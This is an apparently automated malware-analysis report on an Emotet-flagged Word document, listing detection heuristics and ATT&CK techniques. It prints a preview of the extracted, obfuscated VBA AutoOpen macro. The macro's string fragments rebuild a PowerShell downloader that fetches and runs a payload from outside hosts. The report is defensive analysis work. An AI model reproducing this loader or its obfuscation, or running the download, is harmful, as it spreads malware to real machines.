MALICIOUS
304
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro utilizes the Shell() function to execute a payload, and ClamAV identifies it as Emotet. The script attempts to download a second-stage payload from a URL that is partially reconstructed from concatenated strings.
Heuristics 9
-
ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 94178 bytes |
SHA-256: 884d668bbf07f9aa52a50f7487793b6635e3c4966425fa69b35574ebbba04a24 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 44 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NLinQt"
Sub AutoOpen()
XLGGNzq = "JuAbFcd" + "VcJtRQG" + "PpfhIpb" + "SbiYOtD"
MVXMiPIMF
bPIsvii = "YquzMcS" + "MkjkuUH" + "WaZEKPq" + "SSCqiau"
End Sub
Function zYWRUpnit()
hLAmMkfBU = "" + bVBClGz + wORpvjc + SqOKHlk + HcjpzcP + Mid("XK0w6XSvfp46s5l4JA6waa7QjT/a9t+a9trawaa9t+a9tpa9t+a'+'9t.org/7rK+7rKPcLa9t+a9tAiMuw/a9t+a9tgG3a9t'+'+a9t.Spli7rKrYdWJQju", 27, 86) + zcfANVA + BDSNQED + XZqEmiw + jPajiqT
bdjQJjwdflU = "tUNodiA" + "mlpiLcQ" + "nwwrjhk" + "DqkKwQR"
NPHZUYwFI = "" + BWbCisS + iswJipi + cdfRiZj + YzhvIEr + Mid("aOapqawLqZJTbvrOOJwoUcoVdmfP1ha7rK+7rK9t+a9tua9t+a9tas);Invoa9t+a9tkea9t+a9t-Itema9t+a9t(a9t+a9trBa9t+a9tRhuas)a9t+a9t;ba9t+a9trea9t+a9taa9t+a9tka9t+a9t;}catch{a'+'9t+a9twra9t+a9tia9t+aiVSEtR6j", 30, 156) + WEJdAPp + OjwiYua + XkUzSEc + wHEUKGc
lFLZzvF = "XuGZoaH" + "oofiapO" + "ujjJfGA" + "OMwpzPa"
sTzUFwPkkw = "" + pOsPNBX + VKfAcIh + HkoLjrj + WtRdXFt + Mid("NzzbZwlYR+7rKt(gG3a9t+a9V8H2wz", 10, 15) + bZMnRSW + jzkBYZj + wJIjiHh + YvHmsMT
fTdlTl = "Vbmqvdt" + "lTMKqKY" + "nEJHRAX" + "jItpwLD"
ijhokpZtlb = "" + vZrwJkq + wiaMvlT + tAzSqHP + MlkHJRG + Mid("XUolnQhSOH2Pcq+'78NddRVB2LIC4coJW", 15, 2) + wiVKKtM + TzCBSmF + VwtHcCE + KfdzFbj
SHUBwRIFD = "nGoATkz" + "AFBlsGZ" + "DuQYUJq" + "nrzjOCo"
ERzRrCnj = "" + sWkvfHl + NalSszP + pTFiLBN + phaisMj + Mid("rVwIVt57vszIT55VBkhf4+a9t-7r'+'K+7rKoa9t+a9tba9t+a9tjea9t+a9tca9t+a9tta9t+a9t a9t+a9tra9t+a9taa9t+a9tna9t+a'+'9tda9t+a9toa9t+a9tm;rBRa9t+a9tba9t+a9tc'G6RSjorhFw9Rl", 22, 129) + OZRCVuz + cwSWhNi + kTzjjbX + htUvUfC
KlBmTCG = "pJRmvEw" + "BTPXFQM" + "XmLdoiE" + "ObuMkIh"
ZGzGVUTRiDB = "" + kMbKLJH + JRfzzbi + WaKwQVW + HWqTZlk + Mid("ooWlAlUBFvPda9t+a9t = gG3'+'a9t'+'+a9thta9t+a9ttp://kancela9t+a9tara9t+a9tiaua9t+a7rK+7'+'r'+'K9tlewa9t+a9ticz.pla9t+a9t/a9t+a9tUUwMgLa9t+a9ty7rK+7rK/,OoEV9 mdQLfklvU6lJRdzcQw", 12, 140) + arfCVOq + ikZzXYo + qVRzMDi + KbMPNcc
wjaIFk = "pkrlYXi" + "ZAvbMro" + "plwtziR" + "BZUNhFQ"
NDpXb = "" + VXzLqVq + OWPuKoK + WYqRRIh + ITadvoC + Mid("1KVew-o7rK+7rKba9t+a9tjecta9t+a9t System.Na7rK+7rK9t+a9teta9t+a9t.a9t+a9'+'tWeba9t'+'+a9tCla9t+a9ti'+'ent;rBa9t+a9tRna9t+a9tsada9t+a'+'9tasd ='+' na9t+'+'a9tewa'+'9t9Sz7AdbGcr2bNtOsVwKDuCG11Kjm", 4, 162) + mtwcAjE + zNWPvZF + QtrDEqL + nJjnHnM
oLvVwj = "EZiujnb" + "cSRKHGZ" + "LTBWjcs" + "Zjaqwqw"
HSMsj = "" + Ztzjmcp + iRYLUiq + IEhwdsF + cROPjXf + Mid("wT0Atrj46SLTVo9LGst,gG3);rBRkaa9t+a9trapasa9t+a9t = rBRnsa9t+a9t7rK+7rKada9t+a9tasa9t+a9td.na9t+a9tea9t'+'+a9txa9t+a9tt(1,a9t+a9t 3432a97rK+7rKt+a'+'9t47rK+7rKa9t+a9t5);rBzwU2WspAZPzQSwK8", 19, 153) + jHwzEzJ + jsOEWui + YThWOzj + QhpzvVw
fwOpzsT = "ciUFFJB" + "JbMPfjb" + "LTsHzaE" + "zhsSZzQ"
MOHBol = "" + UHiREFN + wszusiB + cnfJljU + NGBTXBZ + Mid("r2SRmzAr]115+[cH'+'Ar]77rK+7rK6+[c'+'HAr]7rK+7rK68),'+'[cHAr]92 -rEplACE ([cHqT5qOCs", 7, 73) + tqMzpFM + ljHuKMK + GLjUZIR + KlbrfXH
hcMMzdzvb = "AhwhEoC" + "ClwCZpr" + "EXOaWJG" + "vRwzsHj"
jlANP = "" + nSzTZGO + MQIOBFP + zjLhTwA + qrskGCO + Mid("a& ((gV '*mDr*').naME[3,11,2]-join'')((('. ( ZgVvErboSEpREFEREnCe.TOSTriNg('+')[1'+',3]+7rKx7rK-JOIn7rK7rK)'+'( (7rK ((a9trBa9t+a'+'9tRfra9t7rK+7rK+a9ta'+'nc = nPsslXpdrRXAE0jAcTcuSaYYCqQhZnk1", 2, 160) + BUzBCUi + jwZhcqY + pCTDfmJ + ivqoGaz
GzwACJij = "aHiSEAK" + "wJNzklT" + "lmzqHbA" + "pYhbPEX"
RUMEjMX = "" + GEuBqsI + rwwzzki + AqovnXA + ACqENuv + Mid("9R7zPwt9tte-host r7rK+7rKBa9t+a9tR_a9t+'+'a'+'9t.Excea9t+a9tptia9t+7rK+7rKa9tona9t+a9t.Me7rK+7rKsa9t+a9tsage7rK+7r'+'K;}}a9t) -crEP'+'LaCE a9trBRa9t,'+'[cHAr]36 -rEplACE ([cHjT2JVTsb257sOI04iBOST", 8, 171) + kRRMHwS + dhOOiPR + OzvkVIq + XkuaVtF
JwJbGC = "BDzcwNG" + "jjmpoPW" + "JahIHim" + "EuTslFM"
snwsO = "" + JujsTOK + MRNKTwI + dkNIuwJ + zDlCufJ + Mid("15sG5+7rKa9t +a9t+a9t rBRkara9t7rK+7rK+a9taa9t+a9tpa7rK+7rKa9t+a9ts + gG3.a9t'+'+a9texegOcfPEK", 6, 83) +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.